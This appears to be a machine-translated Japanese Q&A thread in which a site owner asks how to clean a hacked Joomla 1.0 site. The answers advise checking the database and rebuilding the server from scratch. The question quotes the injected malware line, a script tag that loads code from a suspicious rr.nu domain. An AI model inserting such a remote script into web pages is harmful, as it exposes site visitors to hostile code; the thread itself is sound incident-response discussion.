2012-03-27 7 views
-1

私は1週間前にハッキングされた古い1つのjoomla 10.0.15を持っています。私たちは移行を計画しているのでバックアップはありませんが、何が起こるかを知る必要があります。Joomlaサイトハッキング

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> 
</script> 
<script type="text/javascript"> 
_uacct ="UA-xxxxxxx-x"; 
urchinTracker(); 
</script> 
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script> 
</body> 

すべてのリロードとURLの変更:修正権限の後、すべてのコアファイルを再インストール、まだ二つの問題があり、最初のものは、まだ悪質なコードを持っています。コードがどこにあるのかわかりません。私はテンプレートと他のファイルをチェックしましたが、何も確認しませんでした。私はどこでチェックできますか?

もう1つの問題は、ファイルとフォルダのアクセスにあります。アクセス権が問題なくても、このjoomlaのインストールではフォルダに書き込んだり、ファイルを変更することができません。

ありがとうございます。

+2

Joomlaフォーラムに尋ねてみてください。 – Steven

+1

元のウェブサイトを修正しないでください。 Devinが以下に言及しているように、何が変わったかを確かめることができないので、すべてを修正したかどうかは分かりません。バックアップがない場合は、新しいJoomlaインストールでウェブサイトを再構築してメディアにコピーするだけですが、コードはコピーしないでください。それはJoomlaの非常に非常に古いバージョンです(3年以上)。アドバイスを求める最善の場所は、ここのJ1.0セキュリティフォーラムです:http://bit.ly/HbDJUs – Trev

+0

あなたのjoomlaサイトにいくつかの優れたセキュリティ拡張機能をインストールし、定期的にアクセスログをチェックし、重要な信頼できるソースからの拡張機能のみをインストールし、コアのjoomlaソースファイルを定期的にアップグレードしてください....これらはjoomlaサイトを保護するための最小限の手順です。 –

答えて

2

変更または妥協したことが分かっている既知の正常なバックアップから、コードを再デプロイする必要があります。また、サーバーの責任を負う場合は、セキュリティホールにパッチを当てて、システムに改ざんの兆候がないかどうかチェックする必要がありますが、サーバーのイメージを再作成して最初からやり直すことをお勧めします。

0

悪意のあるコードをデータベースに格納した可能性があります。

ただし、サーバーを侵害したものとして扱う必要があります。ドライブをフォーマットし、オペレーティングシステムを再インストールし、Joomla環境を再構築します。そのサーバーから取り除いたデータも危険なものとして扱います。

関連する問題